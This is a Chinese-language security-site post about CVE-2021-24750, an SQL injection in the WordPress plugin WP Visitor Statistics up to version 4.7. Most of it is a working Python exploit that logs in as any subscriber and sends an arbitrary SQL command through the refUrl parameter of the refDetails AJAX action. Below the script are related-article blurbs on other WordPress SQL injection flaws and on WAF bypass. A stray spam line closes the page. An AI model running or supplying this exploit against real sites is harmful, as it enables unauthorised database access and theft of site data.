<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CVE-2021-24750 Wordpress 插件 WP 訪問者統計 V 4.7 - SQL 注入

    VSole2022-01-22 07:36:30

    版本:<= 4.7

    測試環境:Ubuntu 18.04

    CVE:CVE-2021-24750

    CWE:CWE-89

    描述:

           4.8 之前的 WP 訪問者統計(實時流量)WordPress 插件無法正確清理和轉義 refDetails AJAX 操作中的 refUrl,任何經過身份驗證的用戶都可以使用,這可能允許角色低至訂閱者的用戶執行 SQL 注入攻擊。

    https://nvd.nist.gov/vuln/detail/CVE-2021-24750

    import argparseimport requestsfrom datetime import datetime
    # User-Input:my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')my_parser.add_argument('-T', '--IP', type=str)my_parser.add_argument('-P', '--PORT', type=str)my_parser.add_argument('-U', '--PATH', type=str)my_parser.add_argument('-u', '--USERNAME', type=str)my_parser.add_argument('-p', '--PASSWORD', type=str)my_parser.add_argument('-C', '--COMMAND', type=str)args = my_parser.parse_args()target_ip = args.IPtarget_port = args.PORTwp_path = args.PATHusername = args.USERNAMEpassword = args.PASSWORDcommand = args.COMMAND
    print('')print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))print('')
    # Authentication:session = requests.Session()auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'check = session.get(auth_url)# Header:header = {    'Host': target_ip,    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'application/x-www-form-urlencoded',    'Origin': 'http://' + target_ip,    'Connection': 'close',    'Upgrade-Insecure-Requests': '1'}
    # Body:body = {    'log': username,    'pwd': password,    'wp-submit': 'Log In',    'testcookie': '1'}auth = session.post(auth_url, headers=header, data=body)
    # Exploit:exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'exploit = session.get(exploit_url)print(exploit.text)print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
    
    sql注入wordpress
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    (20220328-20220403)
    2021年9月13日-2021年9月19日 本周漏洞態勢研判情況本周信息安全漏洞威脅整體評價級別為中。
    2021年8月9日-2021年8月15日 本周漏洞態勢研判情況本周信息安全漏洞威脅整體評價級別為中。
    未經身份驗證的攻擊者可能利用跟蹤為CVE-2021-24295的WordPress插件中的“基于垃圾郵件保護,AntiSpam,FireWall by CleanTalk的基于時間的盲SQL注入”來訪問用戶數據。CVE-2021-24295漏洞是一個高嚴重性問題,已被評為。此外,專家指出,插件代碼具有許多功能,這使得成功執行SQL注入攻擊更加困難。另一個問題與嘗試防止SQL注入使用“ sanitize_text_field”函數有關,并且用戶代理已包含在查詢中的單引號中。此漏洞已通過版本解決,但研究人員建議將其更新為最新版本的插件。
    版本:<= 4.7 測試環境:Ubuntu 18.04 CVE:CVE-2021-24750 CWE:CWE-89 描述: 4.8 之前的 WP 訪問者統計(實時流量)WordPress 插件無法正確清理和轉義 refDetails AJAX 操作中的 refUrl,任何經過身份驗證的用戶都可以使用,這可能允許角色低至訂閱者的用戶執行 SQL 注入攻擊。 https://
    CVE-2022–21661 WordPress核心框架WP_Query SQL注入漏洞原理分析與復現。
    ModSecurity防火墻繞過
    SQL 注入 (SQLi) 是一種可以訪問敏感或私有數據的隱蔽攻擊形式,它們最早是在上世紀末被發現的,盡管它們的年齡很大,但它們經常被用作黑客工具包中的一種有效技術。今天,給大家介紹一下頂級 SQLi 檢測工具。 頂級 SQLi 檢測工具 有很多 SQLi 檢測工具,其中許多是開源的,可在 GitHub 上找到,除了專門的 SQLi 檢測工具外,還有更大的套件和專有軟件包將 SQLi 作為其整體
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类